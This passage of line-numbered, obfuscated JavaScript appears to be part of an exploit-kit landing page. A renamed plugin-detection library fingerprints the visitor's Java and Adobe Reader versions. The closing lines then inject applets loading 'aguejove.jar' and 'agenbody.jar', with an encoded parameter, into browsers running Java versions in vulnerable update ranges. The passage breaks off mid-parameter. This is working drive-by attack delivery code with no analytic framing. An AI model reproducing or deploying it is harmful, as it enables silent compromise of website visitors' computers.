  1248. ;if(c.OTF==3&&c.installed!=-0.5&&c.installed!=0.5)
  1249. {
  1250. c.installed=(c.NOTF.isJavaActive(1)==1||c.lang.System.getProperty()[0])?0.5:-0.5
  1251. }
  1252. if(c.OTF==4&&(c.installed==-0.5||c.installed==0.5))
  1253. {
  1254. if(d)
  1255. {
  1256. c.installed=1
  1257. }
  1258. else
  1259. {
  1260. if(c.NOTF.isJavaActive(1)==1)
  1261. {
  1262. if(a)
  1263. {
  1264. c.installed=1;
  1265. d=a
  1266. }
  1267. else
  1268. {
  1269. c.installed=0
  1270. }
  1271.  
  1272. }
  1273. else
  1274. {
  1275. if(a)
  1276. {
  1277. c.installed=-0.2
  1278. }
  1279. else
  1280. {
  1281. c.installed=-1
  1282. }
  1283.  
  1284. }
  1285.  
  1286. }
  1287.  
  1288. }
  1289. ;if(a)
  1290. {
  1291. c.version0=e.formatNum(e.getNum(a))
  1292. }
  1293. if(d)
  1294. {
  1295. c.version=e.formatNum(e.getNum(d))
  1296. }
  1297. if(f&&e.isString(f))
  1298. {
  1299. c.vendor=f
  1300. }
  1301. if(!c.vendor)
  1302. {
  1303. c.vendor=""
  1304. }
  1305. if(c.verify&&c.verify.isEnabled())
  1306. {
  1307. c.getVersionDone=0
  1308. }
  1309. else
  1310. {
  1311. if(c.getVersionDone!=1)
  1312. {
  1313. if(c.OTF<2)
  1314. {
  1315. c.getVersionDone=0
  1316. }
  1317. else
  1318. {
  1319. c.getVersionDone=c.applet.can_Insert_Query_Any()?0:1
  1320. }
  1321.  
  1322. }
  1323.  
  1324. }
  1325.  
  1326. }
  1327. ,DTK:
  1328. {
  1329. $:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;
  1330. DeploymentToolkit"],disabled:function()
  1331. {
  1332. return this.$$.isDisabled.DTK()
  1333. }
  1334. ,query:function()
  1335. {
  1336. var k=this,g=k.$,d=k.$$,j,l,h,m=
  1337. {
  1338.  
  1339. }
  1340. ,f=
  1341. {
  1342.  
  1343. }
  1344. ,a,c=null,i=null,b=(k.hasRun||k.disabled());
  1345. k.hasRun=1;
  1346. if(b)
  1347. {
  1348. return k
  1349. }
  1350. k.status=0;
  1351. if(g.isIE&&g.verIE>=6)
  1352. {
  1353. for(l=0;
  1354. l<k.classID.length;
  1355. l++)
  1356. {
  1357. k.HTML=g.insertHTML("object",["classid",k.classID[l]],[]);
  1358. c=g.getDOMobj(k.HTML);
  1359. try
  1360. {
  1361. if(c&&c.jvms)
  1362. {
  1363. break
  1364. }
  1365.  
  1366. }
  1367. catch(j)
  1368. {
  1369.  
  1370. }
  1371.  
  1372. }
  1373.  
  1374. }
  1375. else
  1376. {
  1377. if(!g.isIE&&(h=g.hasMimeType(k.mimeType))&&h.type)
  1378. {
  1379. k.HTML=g.insertHTML("object",["type",h.type],[]);
  1380. c=g.getDOMobj(k.HTML)
  1381. }
  1382.  
  1383. }
  1384. if(c)
  1385. {
  1386. try
  1387. {
  1388. a=c.jvms;
  1389. if(a)
  1390. {
  1391. i=a.getLength();
  1392. if(g.isNum(i))
  1393. {
  1394. k.status=i>0?1:-1;
  1395. for(l=0;
  1396. l<i;
  1397. l++)
  1398. {
  1399. h=g.getNum(a.get(i-1-l).version);
  1400. if(h)
  1401. {
  1402. k.VERSIONS.push(h);
  1403. f["a"+g.formatNum(h)]=1
  1404. }
  1405.  
  1406. }
  1407.  
  1408. }
  1409.  
  1410. }
  1411.  
  1412. }
  1413. catch(j)
  1414. {
  1415.  
  1416. }
  1417.  
  1418. }
  1419. h=0;
  1420. for(l in f)
  1421. {
  1422. h++
  1423. }
  1424. if(h&&h!==k.VERSIONS.length)
  1425. {
  1426. k.VERSIONS=[]
  1427. }
  1428. if(k.VERSIONS.length)
  1429. {
  1430. k.version=g.formatNum(k.VERSIONS[0])
  1431. }
  1432. ;return k
  1433. }
  1434.  
  1435. }
  1436. ,AXO:
  1437. {
  1438. $:1,hasRun:0,VERSIONS:[],version:"",disabled:function()
  1439. {
  1440. return this.$$.isDisabled.AXO()
  1441. }
  1442. ,JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function()
  1443. {
  1444. var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());
  1445. a.hasRun=1;
  1446. if(c)
  1447. {
  1448. return a
  1449. }
  1450. var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l=
  1451. {
  1452.  
  1453. }
  1454. ;if(e.verIE>=b.minIEver)
  1455. {
  1456. i=a.search(j,j,d);
  1457. if(i.length>0&&d)
  1458. {
  1459. i=a.search(k,k,d)
  1460. }
  1461.  
  1462. }
  1463. else
  1464. {
  1465. if(d)
  1466. {
  1467. i=a.search(f,f,true)
  1468. }
  1469. if(i.length==0)
  1470. {
  1471. i=a.search(h,g,false)
  1472. }
  1473.  
  1474. }
  1475. if(i.length)
  1476. {
  1477. a.version=i[0];
  1478. a.VERSIONS=[].concat(i)
  1479. }
  1480. ;return a
  1481. }
  1482. ,search:function(a,j,p)
  1483. {
  1484. var h,d,f=this,e=f.$,k=f.$$,n,c,l,q,b,o,r,i=[];
  1485. if(e.compareNums(a.join(","),j.join(","))>0)
  1486. {
  1487. j=a
  1488. }
  1489. j=e.formatNum(j.join(","));
  1490. var m,s="1,4,2,0",g="JavaPlugin."+a[0]+""+a[1]+""+a[2]+""+(a[3]>0?("_"+(a[3]<10?"0":"")+a[3]):"");
  1491. for(h=0;
  1492. h<f.JavaVersions.length;
  1493. h++)
  1494. {
  1495. d=f.JavaVersions[h];
  1496. n="JavaPlugin."+d[0]+""+d[1];
  1497. b=d[0]+"."+d[1]+".";
  1498. for(l=d[2];
  1499. l>=0;
  1500. l--)
  1501. {
  1502. r="JavaWebStart.isInstalled."+b+l+".0";
  1503. if(e.compareNums(d[0]+","+d[1]+","+l+",0",j)>=0&&!e.getAXO(r))
  1504. {
  1505. continue
  1506. }
  1507. m=e.compareNums(d[0]+","+d[1]+","+l+",0",s)<0?true:false;
  1508. for(q=d[3];
  1509. q>=0;
  1510. q--)
  1511. {
  1512. c=l+"_"+(q<10?"0"+q:q);
  1513. o=n+c;
  1514. if(e.getAXO(o)&&(m||e.getAXO(r)))
  1515. {
  1516. i.push(b+c);
  1517. if(!p)
  1518. {
  1519. return i
  1520. }
  1521.  
  1522. }
  1523. if(o==g)
  1524. {
  1525. return i
  1526. }
  1527.  
  1528. }
  1529. if(e.getAXO(n+l)&&(m||e.getAXO(r)))
  1530. {
  1531. i.push(b+l);
  1532. if(!p)
  1533. {
  1534. return i
  1535. }
  1536.  
  1537. }
  1538. if(n+l==g)
  1539. {
  1540. return i
  1541. }
  1542.  
  1543. }
  1544.  
  1545. }
  1546. return i
  1547. }
  1548.  
  1549. }
  1550. ,navMime:
  1551. {
  1552. $:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,disabled:function()
  1553. {
  1554. return this.$$.isDisabled.navMime()
  1555. }
  1556. ,query:function()
  1557. {
  1558. var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.disabled());
  1559. i.hasRun=1;
  1560. if(b)
  1561. {
  1562. return i
  1563. }
  1564. ;var n=/^\s*application\/x-java-applet;
  1565. jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k=
  1566. {
  1567.  
  1568. }
  1569. ,c=f.formatNum("0");
  1570. for(l=0;
  1571. l<navigator.mimeTypes.length;
  1572. l++)
  1573. {
  1574. o=navigator.mimeTypes[l];
  1575. m=o?o.enabledPlugin:0;
  1576. g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;
  1577. if(g&&m&&(m.description||m.name))
  1578. {
  1579. if(!k[h+g])
  1580. {
  1581. i.length++
  1582. }
  1583. k[h+g]=o.type;
  1584. if(f.compareNums(g,c)>0)
  1585. {
  1586. c=g
  1587. }
  1588.  
  1589. }
  1590.  
  1591. }
  1592. g=k[h+c];
  1593. if(g)
  1594. {
  1595. o=f.hasMimeType(g);
  1596. i.mimeObj=o;
  1597. i.pluginObj=o?o.enabledPlugin:0;
  1598. i.mimetype=g;
  1599. i.version=c
  1600. }
  1601. ;return i
  1602. }
  1603.  
  1604. }
  1605. ,navPlugin:
  1606. {
  1607. $:1,hasRun:0,version:"",disabled:function()
  1608. {
  1609. return this.$$.isDisabled.navPlugin()
  1610. }
  1611. ,query:function()
  1612. {
  1613. var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.disabled());
  1614. m.hasRun=1;
  1615. if(b)
  1616. {
  1617. return m
  1618. }
  1619. ;a=h.pluginObj.name||"";
  1620. i=h.pluginObj.description||"";
  1621. if(!f||c.debug)
  1622. {
  1623. g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;
  1624. if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5)
  1625. {
  1626. f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")
  1627. }
  1628.  
  1629. }
  1630. document.write('if(!f||c.debug)
  1631. {
  1632. g=/Java[^\d]*Plug-in/i;
  1633. l=g.test(i)?e.for'+'matNum(e.getNum(i)):0;
  1634. k=g.test(a)?e.formatNum(e.getNum(a)):0;
  1635. if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0))
  1636. {
  1637. l=0
  1638. }
  1639. if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0))
  1640. {
  1641. k=0
  1642. }
  1643. d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);
  1644. if(d)
  1645. {
  1646. f=d
  1647. }
  1648.  
  1649. }
  1650. ');
  1651. if(!f&&e.isSafari&&e.OS==2)
  1652. {
  1653. j=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);
  1654. if(j)
  1655. {
  1656. l=e.getNum(j.description);
  1657. if(l)
  1658. {
  1659. f=l
  1660. }
  1661.  
  1662. }
  1663.  
  1664. }
  1665. ;if(f)
  1666. {
  1667. m.version=e.formatNum(f)
  1668. }
  1669. ;return m
  1670. }
  1671.  
  1672. }
  1673. ,lang:
  1674. {
  1675. $:1,System:
  1676. {
  1677. $:1,hasRun:0,result:[null,null],disabled:function()
  1678. {
  1679. return this.$$.isDisabled.windowDotJava()
  1680. }
  1681. ,getPropertyHas:function(a)
  1682. {
  1683. var b=this,d=b.$,c=b.getProperty()[0];
  1684. return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0
  1685. }
  1686. ,getProperty:function()
  1687. {
  1688. var f=this,g=f.$,d=f.$$,i,h=
  1689. {
  1690.  
  1691. }
  1692. ,b=(f.hasRun||f.disabled());
  1693. f.hasRun=1;
  1694. if(!b)
  1695. {
  1696. var a="java_qqq990";
  1697. g[a]=null;
  1698. try
  1699. {
  1700. var c=document.createElement("script");
  1701. c.type="text/javascript";
  1702. c.appendChild(document.createTextNode("(function()
  1703. {
  1704. var e;
  1705. try
  1706. {
  1707. if (window.java && window.java.lang && window.java.lang.System)
  1708. {
  1709. "+g.name+"."+a+'=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" "]
  1710. }
  1711.  
  1712. }
  1713. catch(e)
  1714. {
  1715.  
  1716. }
  1717.  
  1718. }
  1719. )();
  1720. '));
  1721. if(g.head.firstChild)
  1722. {
  1723. g.head.insertBefore(c,g.head.firstChild)
  1724. }
  1725. else
  1726. {
  1727. g.head.appendChild(c)
  1728. }
  1729. g.head.removeChild(c)
  1730. }
  1731. catch(i)
  1732. {
  1733.  
  1734. }
  1735. if(g[a]&&g.isArray(g[a]))
  1736. {
  1737. f.result=[].concat(g[a])
  1738. }
  1739.  
  1740. }
  1741. return f.result
  1742. }
  1743.  
  1744. }
  1745.  
  1746. }
  1747. ,applet:
  1748. {
  1749. $:1,results:[[null,null],[null,null],[null,null]],getResult:function()
  1750. {
  1751. var c=this.results,a,b=[];
  1752. for(a=0;
  1753. a<c.length;
  1754. a++)
  1755. {
  1756. b=c[a];
  1757. if(b[0])
  1758. {
  1759. break
  1760. }
  1761.  
  1762. }
  1763. return[].concat(b)
  1764. }
  1765. ,HTML:[0,0,0],active:[0,0,0],DummyObjTagHTML:0,DummySpanTagHTML:0,allowed:[1,1,1],VerifyTagsHas:function(c)
  1766. {
  1767. var d=this,b;
  1768. for(b=0;
  1769. b<d.allowed.length;
  1770. b++)
  1771. {
  1772. if(d.allowed[b]===c)
  1773. {
  1774. return 1
  1775. }
  1776.  
  1777. }
  1778. return 0
  1779. }
  1780. ,saveAsVerifyTagsArray:function(c)
  1781. {
  1782. var b=this,d=b.$,a;
  1783. if(d.isArray(c))
  1784. {
  1785. for(a=0;
  1786. a<b.allowed.length;
  1787. a++)
  1788. {
  1789. if(d.isNum(c[a]))
  1790. {
  1791. if(c[a]<0)
  1792. {
  1793. c[a]=0
  1794. }
  1795. if(c[a]>3)
  1796. {
  1797. c[a]=3
  1798. }
  1799. b.allowed[a]=c[a]
  1800. }
  1801.  
  1802. }
  1803.  
  1804. }
  1805.  
  1806. }
  1807. ,setVerifyTagsArray:function(d)
  1808. {
  1809. var b=this,c=b.$,a=b.$$;
  1810. if(a.getVersionDone===null)
  1811. {
  1812. b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
  1813. }
  1814. if(a.debug||(a.verify&&a.verify.isEnabled()))
  1815. {
  1816. b.saveAsVerifyTagsArray([3,3,3])
  1817. }
  1818. else
  1819. {
  1820. if(d)
  1821. {
  1822. b.saveAsVerifyTagsArray(d)
  1823. }
  1824.  
  1825. }
  1826.  
  1827. }
  1828. ,allDisabled:function()
  1829. {
  1830. return this.$$.isDisabled.allApplets()
  1831. }
  1832. ,isDisabled:function(d)
  1833. {
  1834. var b=this,c=b.$,a=b.$$;
  1835. if(d==2&&!c.isIE)
  1836. {
  1837. return 1
  1838. }
  1839. if(d===0||d==2)
  1840. {
  1841. return a.isDisabled.ObjectTag()
  1842. }
  1843. if(d==1)
  1844. {
  1845. return a.isDisabled.AppletTag()
  1846. }
  1847.  
  1848. }
  1849. ,can_Insert_Query:function(b)
  1850. {
  1851. var a=this;
  1852. if(a.HTML[b])
  1853. {
  1854. return 0
  1855. }
  1856. return !a.isDisabled(b)
  1857. }
  1858. ,can_Insert_Query_Any:function()
  1859. {
  1860. var b=this,a;
  1861. for(a=0;
  1862. a<b.results.length;
  1863. a++)
  1864. {
  1865. if(b.can_Insert_Query(a))
  1866. {
  1867. return 1
  1868. }
  1869.  
  1870. }
  1871. return 0
  1872. }
  1873. ,should_Insert_Query:function(d)
  1874. {
  1875. var b=this,e=b.allowed,c=b.$,a=b.$$;
  1876. if(!b.can_Insert_Query(d))
  1877. {
  1878. return 0
  1879. }
  1880. if(e[d]==3)
  1881. {
  1882. return 1
  1883. }
  1884. if(e[d]==2.8&&!b.getResult()[0])
  1885. {
  1886. return 1
  1887. }
  1888. if(e[d]==2.5&&!a.lang.System.getProperty()[0])
  1889. {
  1890. return 1
  1891. }
  1892. if(e[d]==2.2&&!a.lang.System.getProperty()[0]&&!b.getResult()[0])
  1893. {
  1894. return 1
  1895. }
  1896. if(!a.nonAppletDetectionOk(a.version0))
  1897. {
  1898. if(e[d]==2)
  1899. {
  1900. return 1
  1901. }
  1902. if(e[d]==1&&!b.getResult()[0])
  1903. {
  1904. return 1
  1905. }
  1906.  
  1907. }
  1908. return 0
  1909. }
  1910. ,should_Insert_Query_Any:function()
  1911. {
  1912. var b=this,a;
  1913. for(a=0;
  1914. a<b.allowed.length;
  1915. a++)
  1916. {
  1917. if(b.should_Insert_Query(a))
  1918. {
  1919. return 1
  1920. }
  1921.  
  1922. }
  1923. return 0
  1924. }
  1925. ,query:function(f)
  1926. {
  1927. var h,a=this,g=a.$,d=a.$$,i=null,j=null,b=a.results,c;
  1928. if((b[f][0]&&b[f][1])||(d.debug&&d.OTF<3))
  1929. {
  1930. return
  1931. }
  1932. c=g.getDOMobj(a.HTML[f],true);
  1933. if(c)
  1934. {
  1935. try
  1936. {
  1937. i=g.getNum(c.getVersion()+" ");
  1938. j=c.getVendor()+" ";
  1939. c.statusbar(g.winLoaded?" ":" ")
  1940. }
  1941. catch(h)
  1942. {
  1943.  
  1944. }
  1945. if(i&&g.isStrNum(i))
  1946. {
  1947. b[f]=[i,j]
  1948. }
  1949. else
  1950. {
  1951.  
  1952. }
  1953. ;try
  1954. {
  1955. if(g.isIE&&i&&c.readyState!=4)
  1956. {
  1957. g.garbage=true;
  1958. c.parentNode.removeChild(c)
  1959. }
  1960.  
  1961. }
  1962. catch(h)
  1963. {
  1964.  
  1965. }
  1966.  
  1967. }
  1968.  
  1969. }
  1970. ,insert_Query_Any:function()
  1971. {
  1972. var d=this,i=d.$,e=d.$$,l=d.results,p=d.HTML,a="&nbsp;
  1973. &nbsp;
  1974. &nbsp;
  1975. &nbsp;
  1976. ",g="A.class",m=i.file.getValid(e);
  1977. if(!m)
  1978. {
  1979. return d.getResult()
  1980. }
  1981. if(e.OTF<1)
  1982. {
  1983. e.OTF=1
  1984. }
  1985. if(d.allDisabled())
  1986. {
  1987. return d.getResult()
  1988. }
  1989. if(e.OTF<1.5)
  1990. {
  1991. e.OTF=1.5
  1992. }
  1993. var j=m.name+m.ext,h=m.path;
  1994. var f=["archive",j,"code",g],c=["mayscript","true"],o=["scriptable","true"].concat(c),n=e.navigator,b=!i.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:e.mimeType[0];
  1995. if(d.should_Insert_Query(0))
  1996. {
  1997. if(e.OTF<2)
  1998. {
  1999. e.OTF=2
  2000. }
  2001. ;p[0]=i.isIE?i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e):i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e);
  2002. l[0]=[0,0];
  2003. d.query(0)
  2004. }
  2005. if(d.should_Insert_Query(1))
  2006. {
  2007. if(e.OTF<2)
  2008. {
  2009. e.OTF=2
  2010. }
  2011. ;p[1]=i.isIE?i.insertHTML("applet",["alt",a].concat(c).concat(f),["codebase",h].concat(c),a,e):i.insertHTML("applet",["codebase",h,"alt",a].concat(c).concat(f),[].concat(c),a,e);
  2012. l[1]=[0,0];
  2013. d.query(1)
  2014. }
  2015. if(d.should_Insert_Query(2))
  2016. {
  2017. if(e.OTF<2)
  2018. {
  2019. e.OTF=2
  2020. }
  2021. ;p[2]=i.isIE?i.insertHTML("object",["classid",e.classID],["codebase",h].concat(f).concat(o),a,e):i.insertHTML();
  2022. l[2]=[0,0];
  2023. d.query(2)
  2024. }
  2025. if(!d.DummyObjTagHTML&&!e.isDisabled.ObjectTag())
  2026. {
  2027. d.DummyObjTagHTML=i.insertHTML("object",[],[],a)
  2028. }
  2029. if(!d.DummySpanTagHTML)
  2030. {
  2031. d.DummySpanTagHTML=i.insertHTML("",[],[],a)
  2032. }
  2033. ;var k=e.NOTF;
  2034. if(e.OTF<3&&k.shouldContinueQuery())
  2035. {
  2036. e.OTF=3;
  2037. k.onIntervalQuery=i.handler(k.$$onIntervalQuery,k);
  2038. if(!i.winLoaded)
  2039. {
  2040. i.WLfuncs0.push([k.winOnLoadQuery,k])
  2041. }
  2042. setTimeout(k.onIntervalQuery,k.intervalLength)
  2043. }
  2044. ;return d.getResult()
  2045. }
  2046.  
  2047. }
  2048. ,NOTF:
  2049. {
  2050. $:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function()
  2051. {
  2052. var e=this,d=e.$,c=e.$$,b=c.applet,a;
  2053. for(a=0;
  2054. a<b.results.length;
  2055. a++)
  2056. {
  2057. if(b.HTML[a]&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&e.isAppletActive(a)>=0)
  2058. {
  2059. return 1
  2060. }
  2061.  
  2062. }
  2063. return 0
  2064. }
  2065. ,isJavaActive:function(d)
  2066. {
  2067. var f=this,c=f.$$,a,b,e=-9;
  2068. for(a=0;
  2069. a<c.applet.HTML.length;
  2070. a++)
  2071. {
  2072. b=f.isAppletActive(a,d);
  2073. if(b>e)
  2074. {
  2075. e=b
  2076. }
  2077.  
  2078. }
  2079. return e
  2080. }
  2081. ,isAppletActive:function(c,a)
  2082. {
  2083. var d=this,b=d.$$.applet.active;
  2084. if(!a)
  2085. {
  2086. b[c]=d.isAppletActive_(c)
  2087. }
  2088. return b[c]
  2089. }
  2090. ,isAppletActive_:function(d)
  2091. {
  2092. var g=this,f=g.$,b=g.$$,l=b.navigator,a=b.applet,h=a.HTML[d],i,k,c=0,j=f.getTagStatus(h,a.DummySpanTagHTML,a.DummyObjTagHTML,g.count);
  2093. if(j==-2)
  2094. {
  2095. return -2
  2096. }
  2097. try
  2098. {
  2099. if(f.isIE&&f.verIE>=b.minIEver&&f.getDOMobj(h).object)
  2100. {
  2101. return 1
  2102. }
  2103.  
  2104. }
  2105. catch(i)
  2106. {
  2107.  
  2108. }
  2109. for(k=0;
  2110. k<a.active.length;
  2111. k++)
  2112. {
  2113. if(a.active[k]>0)
  2114. {
  2115. c=1
  2116. }
  2117.  
  2118. }
  2119. if(j==1&&(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(h.tagName=="object"||c))||b.lang.System.getProperty()[0])))
  2120. {
  2121. return 1
  2122. }
  2123. if(j<0)
  2124. {
  2125. return -1
  2126. }
  2127. return 0
  2128. }
  2129. ,winOnLoadQuery:function(c,d)
  2130. {
  2131. var b=d.$$,a;
  2132. if(b.OTF==3)
  2133. {
  2134. a=d.queryAllApplets();
  2135. d.queryCompleted(a[1],a[2])
  2136. }
  2137.  
  2138. }
  2139. ,$$onIntervalQuery:function(d)
  2140. {
  2141. var c=d.$,b=d.$$,a;
  2142. if(b.OTF==3)
  2143. {
  2144. a=d.queryAllApplets();
  2145. if(!d.shouldContinueQuery()||(c.winLoaded&&d.count>d.countMax))
  2146. {
  2147. d.queryCompleted(a[1],a[2])
  2148. }
  2149.  
  2150. }
  2151. d.count++;
  2152. if(b.OTF==3)
  2153. {
  2154. setTimeout(d.onIntervalQuery,d.intervalLength)
  2155. }
  2156.  
  2157. }
  2158. ,queryAllApplets:function()
  2159. {
  2160. var g=this,f=g.$,e=g.$$,d=e.applet,b,a,c;
  2161. for(b=0;
  2162. b<d.results.length;
  2163. b++)
  2164. {
  2165. d.query(b)
  2166. }
  2167. a=d.getResult();
  2168. c=a[0]?true:false;
  2169. return[c,a[0],a[1]]
  2170. }
  2171. ,queryCompleted:function(c,f)
  2172. {
  2173. var e=this,d=e.$,b=e.$$;
  2174. if(b.OTF>=4)
  2175. {
  2176. return
  2177. }
  2178. b.OTF=4;
  2179. var a=e.isJavaActive();
  2180. b.setPluginStatus(c,f,0);
  2181. if(b.funcs)
  2182. {
  2183. d.callArray(b.funcs)
  2184. }
  2185. if(d.onDoneEmptyDiv)
  2186. {
  2187. d.onDoneEmptyDiv()
  2188. }
  2189.  
  2190. }
  2191.  
  2192. }
  2193. ,zz:0
  2194. }
  2195. ,adobereader:
  2196. {
  2197. mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:
  2198. {
  2199.  
  2200. }
  2201. ,pluginHasMimeType:function(d,c,f)
  2202. {
  2203. var b=this,e=b.$,a;
  2204. for(a in d)
  2205. {
  2206. if(d[a]&&d[a].type&&d[a].type==c)
  2207. {
  2208. return 1
  2209. }
  2210.  
  2211. }
  2212. if(e.getMimeEnabledPlugin(c,f))
  2213. {
  2214. return 1
  2215. }
  2216. return 0
  2217. }
  2218. ,getVersion:function(l,j)
  2219. {
  2220. var g=this,d=g.$,i,f,m,n,b=null,h=null,k=g.mimeType,a,c;
  2221. if(d.isString(j))
  2222. {
  2223. j=j.replace(/\s/g,"");
  2224. if(j)
  2225. {
  2226. k=j
  2227. }
  2228.  
  2229. }
  2230. else
  2231. {
  2232. j=null
  2233. }
  2234. if(d.isDefined(g.INSTALLED[k]))
  2235. {
  2236. g.installed=g.INSTALLED[k];
  2237. return
  2238. }
  2239. if(!d.isIE)
  2240. {
  2241. a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  2242. if(g.getVersionDone!==0)
  2243. {
  2244. g.getVersionDone=0;
  2245. b=d.getMimeEnabledPlugin(g.mimeType,a);
  2246. if(!j)
  2247. {
  2248. n=b
  2249. }
  2250. if(!b&&d.hasMimeType(g.mimeType))
  2251. {
  2252. b=d.findNavPlugin(a,0)
  2253. }
  2254. if(b)
  2255. {
  2256. g.navPluginObj=b;
  2257. h=d.getNum(b.description)||d.getNum(b.name);
  2258. h=d.getPluginFileVersion(b,h);
  2259. if(!h&&d.OS==1)
  2260. {
  2261. if(g.pluginHasMimeType(b,"application/vnd.adobe.pdfxml",a))
  2262. {
  2263. h="9"
  2264. }
  2265. else
  2266. {
  2267. if(g.pluginHasMimeType(b,"application/vnd.adobe.x-mars",a))
  2268. {
  2269. h="8"
  2270. }
  2271.  
  2272. }
  2273.  
  2274. }
  2275.  
  2276. }
  2277.  
  2278. }
  2279. else
  2280. {
  2281. h=g.version
  2282. }
  2283. if(!d.isDefined(n))
  2284. {
  2285. n=d.getMimeEnabledPlugin(k,a)
  2286. }
  2287. g.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))
  2288. }
  2289. else
  2290. {
  2291. b=d.getAXO(g.progID[0])||d.getAXO(g.progID[1]);
  2292. c=/=\s*([\d\.]+)/g;
  2293. try
  2294. {
  2295. f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.classID],["src",""],"",g))).GetVersions();
  2296. for(m=0;
  2297. m<5;
  2298. m++)
  2299. {
  2300. if(c.test(f)&&(!h||RegExp.$1>h))
  2301. {
  2302. h=RegExp.$1
  2303. }
  2304.  
  2305. }
  2306.  
  2307. }
  2308. catch(i)
  2309. {
  2310.  
  2311. }
  2312. g.installed=h?1:(b?0:-1)
  2313. }
  2314. if(!g.version)
  2315. {
  2316. g.version=d.formatNum(h)
  2317. }
  2318. g.INSTALLED[k]=g.installed
  2319. }
  2320.  
  2321. }
  2322. ,zz:0
  2323. }
  2324.  
  2325. }
  2326. ;jimmapse.initScript();
  2327. sentlake = jimmapse.getVersion("Java");
  2328. if (typeof sentlake == "string")
  2329. {
  2330. sentlake = sentlake.split(",");
  2331. if (sentlake[3].length == 1)
  2332. {
  2333. sentlake = "" + sentlake[1] + "0" + sentlake[3];
  2334. }
  2335. else
  2336. {
  2337. sentlake = "" + sentlake[1] + sentlake[3];
  2338. }
  2339.  
  2340. }
  2341. else
  2342. {
  2343. sentlake = 0;
  2344. }
  2345. pdfver = jimmapse.getVersion("AdobeReader");
  2346. if (typeof pdfver == "string")
  2347. {
  2348. pdfver = pdfver.split(",");
  2349. pdfver[3] = pdfver[3].substring(0, 1);
  2350. pdfver = parseInt(pdfver.join(""), 10);
  2351. }
  2352. else
  2353. {
  2354. pdfver = 0;
  2355. }
  2356. if (sentlake >= 400 && sentlake < 700)
  2357. {
  2358. var qh=document.createElement("applet");
  2359. qh.setAttribute("code", "van.class");
  2360. qh.setAttribute("archive", "sorbdant/aguejove.jar");
  2361. var rhp=document.createElement("param");
  2362. rhp.setAttribute("name","bhjwfffiorjwe");
  2363. rhp.setAttribute("value","jMjC/Nj0hk2ZZ2.gktlkdg8ssktMsM9XCB2pt8M.hV0N:Zs.fshZj/N0Ch89Xf///aNBVfBiN1B8Mjg8nghkN0V1kfggXdsaXlotCBCj3k9.C9Vttt3goga3l1Cfly.2hs38j/lN2X911XgcNdMNjf3Vrg91lMtkMe8NX9g908dCjVgtd1XiMsaVZ/f8t1a/sasX3.Vl0a8g/NcVB3V9Ckdo9d3dkka3mjttfkXd8.C33Nf2t.aM3CdX2MfrafXjNCs1/Cka21jVgokX3Ng3Z9p2ltg/MVt/0djk2M/ZlB.jhj30MeZB/2NgCfeNC0MagZ1vB0/gs381a8lalt1XZghNf28/sgiB22Ckjg1l/hsad.9l.l8klC1B/pd89l93Zgh1j.3NhVZp");
  2364. qh.appendChild(rhp);
  2365. document.body.appendChild(qh);
  2366. }
  2367. ;if (sentlake >= 700 && sentlake <= 710)
  2368. {
  2369. var rh=document.createElement("applet");
  2370. rh.setAttribute("code", "vqd.class");
  2371. rh.setAttribute("archive", "sorbdant/agenbody.jar");
  2372. var rhp=document.createElement("param");
  2373. rhp.setAttribute("name","bhjiorjwe");
